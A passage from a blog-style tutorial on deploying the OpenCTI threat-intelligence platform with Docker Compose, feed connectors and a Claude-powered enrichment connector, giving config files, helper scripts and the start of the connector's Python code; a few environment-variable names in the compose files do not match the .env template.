for “threat connect,” but not a confirmed current connector folder equivalent to external-import/threatconnect.</li><li><a href="https://intel471.com/"><strong>Intel 471</strong></a> — Connectors: opencti/connector-intel471, opencti/connector-intel471-darknet, and opencti/connector-intel471_v2 — Strengths: underground forums, cybercrime actors, malware, infrastructure, dark web intelligence.</li></ul><h4>4.3 ISAC / Government Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dtrgjORW-h5AoEi0rOMBHw.png"></figure><ul><li><a href="https://www.cisa.gov/resources-tools/services/automated-indicator-sharing-ais-service?utm_source=chatgpt.com"><strong>CISA Automated Indicator Sharing / AIS</strong></a> — Method: TAXII/STIX client, AIS 2.0 uses TAXII 2.1 — Access: free service for eligible participants; contact CISA to onboard.</li><li><a href="https://www.fsisac.com/?utm_source=chatgpt.com"><strong>FS-ISAC</strong></a> — Method: STIX/TAXII and MISP automated feeds — Access: financial-sector membership; automated-feed credentials/licensing must be explicitly requested.</li><li><a href="https://health-isac.org/"><strong>Health-ISAC / H-ISAC</strong></a> — Method: HITS indicator-sharing feed; STIX/TAXII-compatible threat intelligence sharing — Access: healthcare-sector membership / Health-ISAC member access.</li><li><a href="https://www.misp-project.org/communities/?utm_source=chatgpt.com"><strong>NATO MISP Community</strong></a> — Method: MISP community / MISP sync — Access: official government cyber-defense entities from NATO nations, sponsored by their national representative in the NATO Multinational MISP Steering Board.</li><li><a href="https://www.enisa.europa.eu/topics/cyber-threats/threat-landscape?utm_source=chatgpt.com"><strong>ENISA Threat Landscape</strong></a> — Method: public reports and CTI publications; not a confirmed public TAXII/STIX feed. ENISA’s CTL methodology references STIX 2.1 as a common CTI representation format, but this is different from offering a public feed endpoint.</li></ul><h4>4.4 Feed Priority and TLP Assignment</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XhNw0PBdOVuwb9zHT37S5Q.png"></figure><pre># Recommended TLP assignment by source<br>feeds:<br>  - source: mitre_attack<br>    tlp: WHITE          # public, shareable<br>    confidence: 90<br>  - source: alienvault_otx<br>    tlp: GREEN          # community sharing<br>    confidence: 60<br>  - source: mandiant<br>    tlp: AMBER          # restricted to org<br>    confidence: 85<br>  - source: internal_soc<br>    tlp: RED            # internal only<br>    confidence: 95</pre><h3>5. AI Integration Layer</h3><p>This is the “AI-driven” layer on top of standard OpenCTI — a custom connector and MCP server that adds:</p><h4>5.1 AI Enrichment Connector (Claude API)</h4><ul><li>On every new Report, Malware, or Threat-Actor ingested → call Claude API</li><li>Extract structured STIX entities from unstructured text (PDFs, blog posts)</li><li>Summarize long reports into 3-sentence executive briefs</li><li>Score indicator relevance against your organization’s sector profile</li><li>Suggest ATT&amp;CK technique mappings from narrative descriptions</li></ul><h4>5.2 AI Pipeline Architecture</h4><pre>New Report ingested<br>        │<br>        ▼<br>[AI Enrichment Connector]<br>        │<br>        ├─► Claude API: Extract entities → creates STIX SDOs<br>        ├─► Claude API: Map to ATT&amp;CK techniques<br>        ├─► Claude API: Generate executive summary<br>        └─► Claude API: Score severity for your sector<br>                │<br>                ▼<br>        Update Report in OpenCTI<br>        (summary, related entities, confidence scores)</pre><h3>6. Prerequisites</h3><h4>6.1 Hardware (minimum production)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ics48TK_7nXqH-diy8Uzng.png"></figure><h4>6.2 Software</h4><pre># Install Docker Engine (Ubuntu 22.04)<br>sudo apt-get update<br>sudo apt-get install -y ca-certificates curl gnupg lsb-release<br>sudo install -m 0755 -d /etc/apt/keyrings<br>curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \<br>  sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg<br>sudo chmod a+r /etc/apt/keyrings/docker.gpg<br>echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] \<br>  https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | \<br>  sudo tee /etc/apt/sources.list.d/docker.list &gt; /dev/null<br>sudo apt-get update<br>sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin<br># Add user to docker group<br>sudo usermod -aG docker $USER<br>newgrp docker<br># Verify<br>docker compose version</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*eM3O8rdQsyvwxf-0WEZX8w.png"></figure><h4>6.3 System Tuning (required for ElasticSearch)</h4><pre># ElasticSearch requires high vm.max_map_count<br>sudo sysctl -w vm.max_map_count=1048575<br>echo "vm.max_map_count=1048575" | sudo tee -a /etc/sysctl.conf<br><br># Increase file descriptor limits<br>echo "* soft nofile 65536" | sudo tee -a /etc/security/limits.conf<br>echo "* hard nofile 65536" | sudo tee -a /etc/security/limits.conf</pre><h3>7. Docker Compose Deployment</h3><h4><strong>7.0 Deploy from GitHub (recommended)</strong></h4><p>The fastest deployment path is to clone the maintained project repository and create a local `.env` from the sanitized template:</p><pre>cd /home/andrey<br>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd /home/andrey/openCTI<br># Create local secrets/config. This file is ignored by Git.<br>cp .env.example .env<br>nano .env<br># Start the full stack after filling in .env<br>./scripts/start-all.sh</pre><p>This gives you the Docker Compose files, OpenCTI patches, AI enrichment connector, helper scripts, and Docusaurus documentation in one checkout. Use the manual sections below if you want to recreate the files by hand or compare the generated content.</p><h4>7.1 Directory Structure</h4><pre>/home/andrey/openCTI/<br>├── .env                          # secrets and config<br>├── docker-compose.yml            # core stack<br>├── docker-compose.connectors.yml # feed connectors<br>├── docker-compose.ai.yml         # AI enrichment connector<br>├── patches/<br>│   └── back.js                   # ILM race condition fix (ES 8.13 + OpenCTI 6.2.0)<br>└── connectors/<br>    └── ai-enrichment/            # custom AI connector source</pre><h4>7.2 Environment File</h4><pre>cat &gt; /home/andrey/openCTI/.env &lt;&lt; 'EOF'<br># === Core ===<br>OPENCTI_ADMIN_EMAIL=admin@opencti.local<br>OPENCTI_ADMIN_PASSWORD=CHANGE_ME_STRONG_PASSWORD<br>OPENCTI_ADMIN_TOKEN=CHANGE_ME_UUID4_TOKEN<br>OPENCTI_BASE_URL=http://localhost:8080<br><br># === Secrets ===<br>APP__ADMIN__TOKEN=CHANGE_ME_UUID4_TOKEN<br>APP__SECRET_KEY=CHANGE_ME_SECRET<br><br># === ElasticSearch ===<br># NOTE: key is ELASTIC_PASSWORD, not ELASTIC_AUTH<br>ELASTIC_PASSWORD=CHANGE_ME_ELASTIC_PASS<br><br># === Redis ===<br>REDIS_PASSWORD=opencti<br><br># === MinIO ===<br>MINIO_ROOT_USER=opencti<br>MINIO_ROOT_PASSWORD=CHANGE_ME_MINIO_PASS<br><br># === RabbitMQ ===<br>RABBITMQ_DEFAULT_USER=opencti<br>RABBITMQ_DEFAULT_PASS=CHANGE_ME_RABBITMQ_PASS<br><br># === Connector IDs (unique UUID4 per connector — NOT used for auth) ===<br>CONNECTOR_MITRE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_CVE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ALIENVAULT_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ABUSE_SSL_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_URLHAUS_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_AI_ENRICHMENT_TOKEN=CHANGE_ME_UUID4<br><br># === External API keys ===<br>ALIENVAULT_API_KEY=your_otx_key_here<br>NVD_API_KEY=your_nvd_api_key_here     # UUID format from nvd.nist.gov/developers/request-an-api-key<br>ANTHROPIC_API_KEY=your_claude_api_key_here<br>EOF<br><br># Generate unique UUIDs for connector IDs<br>python3 -c "import uuid; [print(uuid.uuid4()) for _ in range(8)]"# Generate proper tokens<br>python3 -c "import uuid; [print(f'Token: {uuid.uuid4()}') for _ in range(10)]"</pre><h4>7.3 Core Stack — docker-compose.yml</h4><pre>nano docker-compose.yml</pre><pre>version: "3"<br>services:<br>  redis:<br>    image: redis:7.2<br>    restart: always<br>    volumes:<br>      - redisdata:/data<br>    command: redis-server --requirepass ${REDIS_PASSWORD:-opencti}<br>  elasticsearch:<br>    image: docker.elastic.co/elasticsearch/elasticsearch:8.13.0<br>    volumes:<br>      - esdata:/usr/share/elasticsearch/data<br>    environment:<br>      - discovery.type=single-node<br>      - xpack.ml.enabled=false<br>      - xpack.security.enabled=true<br>      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-CHANGE_ME}<br>      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"<br>      - cluster.routing.allocation.disk.threshold_enabled=false<br>    ulimits:<br>      memlock:<br>        soft: -1<br>        hard: -1<br>    restart: always<br>  minio:<br>    image: minio/minio:RELEASE.2024-01-16T16-07-38Z<br>    volumes:<br>      - miniodata:/data<br>    ports:<br>      - "9001:9001"   # console<br>    environment:<br>      MINIO_ROOT_USER: ${MINIO_ROOT_USER:-opencti}<br>      MINIO_ROOT_PASSWORD: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>    command: server /data --console-address ":9001"<br>    restart: always<br>  rabbitmq:<br>    image: rabbitmq:3.13-management<br>    environment:<br>      RABBITMQ_DEFAULT_USER: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ_DEFAULT_PASS: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      RABBITMQ_NODENAME: rabbit01@localhost<br>    volumes:<br>      - rabbitmqdata:/var/lib/rabbitmq<br>    restart: always<br>  opencti:<br>    image: opencti/platform:6.2.0<br>    environment:<br>      NODE_OPTIONS: --max-old-space-size=8096<br>      APP__PORT: 8080<br>      APP__BASE_URL: ${OPENCTI_BASE_URL:-http://localhost:8080}<br>      APP__ADMIN__EMAIL: ${OPENCTI_ADMIN_EMAIL}<br>      APP__ADMIN__PASSWORD: ${OPENCTI_ADMIN_PASSWORD}<br>      APP__ADMIN__TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      APP__APP_LOGS__LOGS_LEVEL: error<br>      REDIS__HOSTNAME: redis<br>      REDIS__PORT: 6379<br>      REDIS__USE_SSL: "false"<br>      REDIS__PASSWORD: ${REDIS_PASSWORD:-opencti}<br>      ELASTICSEARCH__URL: http://elasticsearch:9200<br>      ELASTICSEARCH__USERNAME: elastic<br>      ELASTICSEARCH__PASSWORD: ${ELASTIC_PASSWORD:-CHANGE_ME}<br>      MINIO__ENDPOINT: minio<br>      MINIO__PORT: 9000<br>      MINIO__USE_SSL: "false"<br>      MINIO__ACCESS_KEY: ${MINIO_ROOT_USER:-opencti}<br>      MINIO__SECRET_KEY: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>      RABBITMQ__HOSTNAME: rabbitmq<br>      RABBITMQ__PORT: 5672<br>      RABBITMQ__USERNAME: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ__PASSWORD: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      SMTP__HOSTNAME: localhost<br>      PROVIDERS__LOCAL__STRATEGY: LocalStrategy<br>    volumes:<br>      - ./patches/back.js:/opt/opencti/build/back.js:ro<br>    ports:<br>      - "8080:8080"<br>    depends_on:<br>      - redis<br>      - elasticsearch<br>      - minio<br>      - rabbitmq<br>    restart: always<br>  worker:<br>    image: opencti/worker:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      WORKER_LOG_LEVEL: error<br>    depends_on:<br>      - opencti<br>    deploy:<br>      mode: replicated<br>      replicas: 3<br>    restart: always<br>volumes:<br>  esdata:<br>  redisdata:<br>  miniodata:<br>  rabbitmqdata:<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.4 Connectors — docker-compose.connectors.yml</h4><pre>nano docker-compose.connectors.yml</pre><pre>version: "3"<br>services:<br>  # MITRE ATT&amp;CK (no API key needed)<br>  connector-mitre:<br>    image: opencti/connector-mitre:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MITRE_TOKEN}<br>      CONNECTOR_NAME: "MITRE ATT&amp;CK"<br>      CONNECTOR_SCOPE: "marking-definition,identity,attack-pattern,course-of-action,intrusion-set,campaign,malware,tool,vulnerability,x-mitre-matrix,x-mitre-tactic,x-mitre-collection"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CONNECTOR_LOG_LEVEL: error<br>      MITRE_REMOVE_STATEMENT_MARKING: "true"<br>      MITRE_INTERVAL: 7  # days between full refresh<br>    restart: always<br>  # CVE / NVD Vulnerabilities<br>  connector-cve:<br>    image: opencti/connector-cve:6.2.0<br>    volumes:<br>      - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>      - ./patches/cve/vulnerability.py:/opt/opencti-connector-cve/services/client/vulnerability.py:ro<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_CVE_TOKEN}<br>      CONNECTOR_NAME: "Common Vulnerabilities and Exposures"<br>      CONNECTOR_SCOPE: "identity,vulnerability"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: info<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CVE_BASE_URL: "https://services.nvd.nist.gov/rest/json/cves"<br>      CVE_API_KEY: ${NVD_API_KEY}<br>      CVE_MAX_DATE_RANGE: 120<br>      CVE_MAINTAIN_DATA: "true"<br>      CVE_INTERVAL: 2<br>    restart: always<br>  # AlienVault OTX<br>  connector-alienvault:<br>    image: opencti/connector-alienvault:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_ALIENVAULT_TOKEN}<br>      CONNECTOR_NAME: "AlienVault OTX"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      ALIENVAULT_BASE_URL: "https://otx.alienvault.com"<br>      ALIENVAULT_API_KEY: ${ALIENVAULT_API_KEY}<br>      ALIENVAULT_TLP: "White"<br>      ALIENVAULT_CREATE_OBSERVABLES: "true"<br>      ALIENVAULT_CREATE_INDICATORS: "true"<br>      ALIENVAULT_PULSE_START_TIMESTAMP: "2020-01-01T00:00:00"<br>      ALIENVAULT_REPORT_STATUS: "New"<br>      ALIENVAULT_REPORT_TYPE: "threat-report"<br>      ALIENVAULT_GUESS_MALWARE: "false"<br>      ALIENVAULT_GUESS_CVE: "false"<br>      ALIENVAULT_INTERVAL: 30   # minutes<br>    restart: always<br>  # Abuse.ch SSL Blacklist<br>  connector-abuse-ssl:<br>    image: opencti/connector-abuse-ssl:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MALWAREBAZAAR_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch SSL Blacklist"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 50<br>      CONNECTOR_LOG_LEVEL: error<br>      ABUSE_SSL_URL: "https://sslbl.abuse.ch/blacklist/sslblacklist.csv"<br>      ABUSE_SSL_INTERVAL: 30  # minutes<br>    restart: always<br>  # Abuse.ch URLhaus<br>  connector-urlhaus:<br>    image: opencti/connector-urlhaus:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_URLHAUS_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch URLhaus"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      URLHAUS_CSV_URL: "https://urlhaus.abuse.ch/downloads/csv_recent/"<br>      URLHAUS_IMPORT_OFFLINE: "true"<br>      URLHAUS_INTERVAL: 2  # hours<br>    restart: always<br>  connector-threatfox:<br>    image: opencti/connector-threatfox:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_THREATFOX_TOKEN}<br>      CONNECTOR_NAME: "ThreatFox"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      THREATFOX_API_URL: "https://threatfox-api.abuse.ch/api/v1/"<br>      THREATFOX_CREATE_INDICATORS: "true"<br>      THREATFOX_CREATE_OBSERVABLES: "true"<br>      THREATFOX_INTERVAL: 3<br>    restart: always<br>  connector-import-document:<br>    image: opencti/connector-import-document:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_IMPORT_DOCUMENT_TOKEN}<br>      CONNECTOR_NAME: "ImportDocument"<br>      CONNECTOR_SCOPE: "application/pdf,text/plain,text/html"<br>      CONNECTOR_AUTO: "true"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: error<br>    restart: always<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.5 AI Enrichment Connector — docker-compose.ai.yml</h4><pre>nano docker-compose.ai.yml</pre><pre>version: "3"<br><br>services:<br>  connector-ai-enrichment:<br>    build:<br>      context: ./connectors/ai-enrichment<br>      dockerfile: Dockerfile<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_AI_ENRICHMENT_TOKEN}<br>      CONNECTOR_NAME: "AI Enrichment (Claude)"<br>      CONNECTOR_LOG_LEVEL: info<br>      ANTHROPIC_API_KEY: ${ANTHROPIC_API_KEY}<br>      AI_MODEL: claude-opus-4-7<br>      AI_ENRICHMENT_REPORTS: "true"<br>      AI_ENRICHMENT_MALWARE: "true"<br>      AI_ENRICHMENT_THREAT_ACTORS: "true"<br>    restart: always<br><br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h3>8. Connector Configuration</h3><h4>Fast Start / Stop Scripts</h4><p>The repository includes two helper scripts for daily operations:</p><pre># Start core OpenCTI, wait for the UI/API, then start connectors and AI enrichment<br>./scripts/start-all.sh<br># Stop AI enrichment, connectors, and core OpenCTI while preserving Docker volumes<br>./scripts/stop-all.sh</pre><p>Use these scripts for normal start/stop operations after .env is configured. Use the manual commands below when debugging a specific service startup problem.</p><pre>nano start-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>WAIT_TIMEOUT="${WAIT_TIMEOUT:-300}"<br><br>wait_for_opencti() {<br>  local deadline=$((SECONDS + WAIT_TIMEOUT))<br><br>  echo "[start] Waiting for OpenCTI API on http://localhost:8080..."<br>  until curl -fsS http://localhost:8080 &gt;/dev/null 2&gt;&amp;1; do<br>    if (( SECONDS &gt;= deadline )); then<br>      echo "[start] OpenCTI did not become reachable within ${WAIT_TIMEOUT}s." &gt;&amp;2<br>      echo "[start] Check logs with: docker compose logs -f opencti" &gt;&amp;2<br>      return 1<br>    fi<br>    sleep 5<br>  done<br>}<br><br>echo "[start] Starting OpenCTI core stack..."<br>docker compose -f docker-compose.yml up -d<br><br>wait_for_opencti<br><br>echo "[start] Starting external connectors..."<br>docker compose -f docker-compose.connectors.yml up -d<br><br>echo "[start] Building and starting AI enrichment connector..."<br>docker compose -f docker-compose.ai.yml up -d --build<br><br>echo "[start] Done."<br>docker compose -f docker-compose.yml ps</pre><pre>nano stop-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>echo "[stop] Stopping OpenCTI core, connectors, and AI enrichment..."<br>docker compose \<br>  -f docker-compose.yml \<br>  -f docker-compose.connectors.yml \<br>  -f docker-compose.ai.yml \<br>  down --remove-orphans<br><br>echo "[stop] Done. Volumes are preserved."</pre><h4>8.1 Start the Core Stack</h4><pre>cd /home/andrey/openCTI<br><br># Pre-flight: ElasticSearch refuses allocation above 90% disk usage<br>df -h /var/lib/docker<br># If &gt; 90% full, run: docker system prune -a   (frees ~47 GB of unused images)<br><br># Create the shared Docker network (idempotent — safe to re-run)<br>docker network create opencti_network 2&gt;/dev/null || true<br><br># Start core services<br>docker compose -f docker-compose.yml up -d<br><br># Wait for ElasticSearch to be healthy before OpenCTI finishes initializing<br>until curl -s -u "elastic:${ELASTIC_PASSWORD}" \<br>  http://localhost:9200/_cluster/health | grep -q '"status":"green"\|"status":"yellow"'; do<br>  echo "Waiting for ES..."; sleep 5<br>done<br><br># Watch logs — first-run index creation takes 5-10 minutes<br># Look for "Listening on port 8080"<br>docker compose -f docker-compose.yml logs -f opencti | grep -E "Listening|ERROR|indices"</pre><h4>8.2 Start Connectors</h4><pre># Start feed connectors (after OpenCTI is healthy)<br>docker compose -f docker-compose.connectors.yml up -d<br># Verify connectors registered (wait ~60s for startup)<br>docker compose -f docker-compose.connectors.yml ps</pre><h4>8.3 Verify in UI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bgDghte5c5Hd2tKbutvP8A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fIQLlAGqYjzNesmSnRw2QQ.png"></figure><pre>http://localhost:8080<br>Login: admin@opencti.local / &lt;your password&gt;Navigation:<br>  Data → Connectors → check all show status "connected"<br>  Knowledge → Malwares → should start populating within minutes<br>  Activities → Logs → watch ingest events</pre><h3>9. AI-Driven Enrichment Pipeline</h3><h4>Overview</h4><p>The AI enrichment pipeline adds a Claude-powered layer on top of the standard OpenCTI ingestion flow. Every time a connector (AlienVault, MITRE, URLhaus, etc.) writes a new object into OpenCTI, an event is published to RabbitMQ. The AI connector subscribes to that event stream, calls the Claude API with the object’s content, and writes the extracted structured intelligence back into the graph as STIX relationships, notes, and entity updates — all automatically.</p><p><strong>Without AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                   (raw text, no relationships, no ATT&amp;CK mapping)</pre><p><strong>With AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                       ↓ AI connector picks it up from event stream<br>                   Claude API: extract entities, map techniques, score severity<br>                       ↓<br>                   Report now has:<br>                   ├── Note: executive summary (2-3 sentences)<br>                   ├── Relationship → ThreatActor (if found in graph)<br>                   ├── Relationship → Malware (if found in graph)<br>                   ├── Relationship → AttackPattern T1059.001 (created if missing)<br>                   └── x_opencti_score updated based on AI confidence</pre><h4>9.1 How the Event Stream Works</h4><p>OpenCTI uses RabbitMQ as its internal message bus. Every write operation (create, update, delete) on any STIX object publishes a message to a topic exchange. Connectors subscribe to this exchange via pycti's OpenCTIConnectorHelper.listen() method.</p><pre>OpenCTI platform<br>      │<br>      │ write event (STIX bundle)<br>      ▼<br>  RabbitMQ<br>  exchange: amq.topic<br>      │<br>      ├──► worker-1 (standard workers — write to ES/graph)<br>      ├──► worker-2<br>      ├──► worker-3<br>      └──► connector-ai-enrichment  ← our connector subscribes here<br>                  │<br>                  │ reads event payload:<br>                  │ {<br>                  │   "type": "create",<br>                  │   "data": { "id": "report--uuid", "type": "report", ... }<br>                  │ }<br>                  ▼<br>            calls Claude API<br>                  ▼<br>            writes enrichment back via GraphQL API</pre><p>Each message contains the full STIX object that was just created. The connector processes it and acknowledges the message — if it crashes mid-processing, RabbitMQ redelivers it.</p><p><strong>Connector type </strong><strong>INTERNAL_ENRICHMENT</strong> means:</p><ul><li>It does not import data on a schedule</li><li>It reacts to existing objects as they are created or updated</li><li>It appears in Settings → Connectors → Enrichment in the UI</li></ul><h4>9.2 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.10. Post-Deployment Hardening</p><h4>9.2 What Claude Extracts and How It Maps to STIX</h4><p>The connector sends the report’s description text to Claude with a structured prompt. Claude returns JSON. The connector then maps each field to STIX operations:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f1BfkVeUO3Qlt9Kj6-MkFg.png"></figure><p>Claude output fieldSTIX actionsummaryCreates a Note object attached to the report (object_refs)threat_actors[]Looks up ThreatActor by name in graph → creates related-to relationship to reportmalware_families[]Looks up Malware by name → creates related-to relationship to reportattack_techniques[]Looks up AttackPattern by external_id (T1059.001) → creates uses relationship to reporttargeted_sectors[]Looks up Identity (sector) → creates targets relationshiptargeted_countries[]Looks up Location by ISO code → creates targets relationshipconfidenceSets x_opencti_score on the report (0–100)</p><p><strong>Why look up instead of creating?</strong> MITRE ATT&amp;CK and identity data is already loaded by the MITRE connector. Looking up prevents duplicates. Only AttackPattern objects are created if missing (since Claude may identify techniques not yet in the graph).</p><h4>9.3 Connector Code</h4><pre>mkdir -p /home/andrey/openCTI/connectors/ai-enrichment</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/connector.py"><strong>connectors/ai-enrichment/connector.py</strong></a></p><pre>import os<br>import json<br>import time<br>import anthropic<br>from pycti import OpenCTIConnectorHelper<br><br>SYSTEM_PROMPT = """You are a senior cyber threat intelligence analyst.<br>Analyze threat intelligence content and return structured JSON only.<br>No prose, no markdown fences, no explanation — raw JSON."""<br><br>REPORT_PROMPT = """Analyze this threat intelligence report. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief, plain text)<br>- threat_actors: list of strings (actor names, aliases, groups mentioned)<br>- malware_families: list of strings (malware/tool names)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs only, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (e.g. ["Finance", "Healthcare", "Government"])<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2, e.g. ["US", "UA", "DE"])<br>- confidence: integer 0-100<br><br>Report:<br>{content}"""<br><br>INTRUSION_SET_PROMPT = """Analyze this threat actor / intrusion set profile. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief)<br>- aliases: list of strings (other known names)<br>- malware_families: list of strings (malware/tools this actor uses)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (sectors this actor targets)<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2 codes)<br>- motivation: string (one of: "espionage", "financial", "hacktivism", "destruction", "unknown")<br>- sophistication: string (one of: "minimal", "intermediate", "advanced", "expert", "unknown")<br>- confidence: integer 0-100<br><br>Profile:<br>{content}"""<br><br><br>class AIEnrichmentConnector:<br>    def __init__(self):<br>        config = {<br>            "opencti": {<br>                "url": os.environ.get("OPENCTI_URL", "http://opencti:8080"),<br>                "token": os.environ["OPENCTI_TOKEN"],<br>            },<br>            "connector": {<br>                "id": os.environ["CONNECTOR_ID"],<br>                "type": "INTERNAL_ENRICHMENT",<br>                "name": os.environ.get("CONNECTOR_NAME", "AI Enrichment (Claude)"),<br>                "scope": "Report,Intrusion-Set,Threat-Actor-Group,Malware",<br>                "log_level": os.environ.get("CONNECTOR_LOG_LEVEL", "info"),<br>                "auto": False,<br>            },<br>        }<br>        self.helper = OpenCTIConnectorHelper(config)<br>        self.client = anthropic.Anthropic(api_key=os.environ["ANTHROPIC_API_KEY"])<br>        self.model = os.environ.get("AI_MODEL", "claude-opus-4-7")<br><br>    # 